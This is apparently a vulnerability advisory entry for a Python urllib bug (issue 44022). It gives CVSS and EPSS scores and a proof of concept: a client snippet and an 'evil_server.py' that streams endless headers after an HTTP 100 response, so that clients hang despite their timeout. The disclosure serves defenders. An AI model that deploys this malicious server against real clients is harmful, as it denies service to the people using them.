7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.1 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:N/I:N/A:C
0.004 Low
EPSS
Percentile
69.5%
if a client request a http/https/ftp service which is controlled by attacker, attacker can make this client hang forever, event client has set “timeout” argument.
maybe this client also will consume more and more memory. i does not test on this conclusion.
import urllib.request
req = urllib.request.Request('http://127.0.0.1:8085')
response = urllib.request.urlopen(req, timeout=1)
evil_server.py
# coding:utf-8
from socket import *
from multiprocessing import *
from time import sleep
def dealWithClient(newSocket,destAddr):
recvData = newSocket.recv(1024)
newSocket.send(b"""HTTP/1.1 100 OK\n""")
while True:
# recvData = newSocket.recv(1024)
newSocket.send(b"""x:a\n""")
if len(recvData)>0:
# print('recv[%s]:%s'%(str(destAddr), recvData))
pass
else:
print('[%s]close'%str(destAddr))
sleep(10)
print('over')
break
# newSocket.close()
def main():
serSocket = socket(AF_INET, SOCK_STREAM)
serSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR , 1)
localAddr = ('', 8085)
serSocket.bind(localAddr)
serSocket.listen(5)
try:
while True:
newSocket,destAddr = serSocket.accept()
client = Process(target=dealWithClient, args=(newSocket,destAddr))
client.start()
newSocket.close()
finally:
serSocket.close()
if __name__ == '__main__':
main()
if a client request a http/https/ftp service which is controlled by attacker, attacker can make this client hang forever, event client has set “timeout” argument.
more info, see https://bugs.python.org/issue44022
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.1 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:N/I:N/A:C
0.004 Low
EPSS
Percentile
69.5%